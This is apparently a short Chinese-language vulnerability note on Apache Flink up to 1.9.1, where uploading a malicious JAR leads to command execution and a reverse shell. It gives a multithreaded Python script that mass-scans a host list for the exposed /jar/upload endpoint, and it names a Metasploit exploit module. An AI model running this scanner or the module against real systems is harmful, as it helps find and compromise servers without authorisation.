Apache Flink 1.9.x:上传恶意 JAR 包可导致任意命令执行(反弹 shell)
受影响版本:<= 1.9.1
import os
import subprocess
import requests
from multiprocessing.dummy import Pool as ThreadPool
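def get_iplist():
    """Load the host list from the file ``iplist`` in the working directory.

    The file is read as one host per line. Surrounding whitespace is
    stripped, and blank lines are skipped so that an empty string is never
    handed on as a host (it would otherwise be turned into a URL with no
    host part).

    Returns:
        list[str]: the non-empty, stripped lines in file order.

    Raises:
        OSError: if ``iplist`` cannot be opened.
    """
    with open('iplist', 'r') as file:
        stripped_lines = (line.strip() for line in file)
        return [host for host in stripped_lines if host]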
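def poc(ip):
    """Check whether ``http://<ip>:8081/jar/upload`` answers with a JSON body.

    This is a reachability check only: it sends one GET request with a
    2-second timeout and uploads nothing. A hit means the endpoint replied
    with parseable JSON to a request that carried no credentials; it does
    not establish the Flink version or confirm the host is affected.

    Args:
        ip: host name or address, without scheme or port.

    Returns:
        dict: ``state`` is 1 when a JSON reply was received (``msg`` holds
        the decoded body and ``url`` the probed URL), otherwise 0. Results
        with ``state == 1`` are also printed.
    """
    url = 'http://' + ip + ':8081/jar/upload'
    try:
        res = requests.get(url=url, timeout=2)
        # NOTE(review): any service that returns JSON on this port and path
        # is reported as a hit. Confirm findings manually before acting.
        data = {
            'msg': res.json(),
            'state': 1,
            'url': url,
            'ip': ip
        }
    except Exception:
        # Timeouts, refused connections, malformed hosts and non-JSON bodies
        # all land here. 'Secure' therefore only means "no JSON answer within
        # the timeout", not a verified-safe host. Catching Exception rather
        # than using a bare except keeps one bad entry from aborting the run
        # while no longer swallowing KeyboardInterrupt and SystemExit.
        data = {
            'msg': 'Secure',
            'state': 0,
            'ip': ip
        }
    if data['state'] == 1:
        print(data)
    return data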
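if __name__ == '__main__':
    # Run poc() over every host from the 'iplist' file using 50 worker threads.
    iplist = get_iplist()
    # map() blocks until every host has been checked. The context manager
    # then shuts the worker threads down instead of leaving the pool open
    # until interpreter exit.
    with ThreadPool(50) as pool:
        pool.map(poc, iplist)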
use exploit/multi/http/apache_flink_jar_upload_exec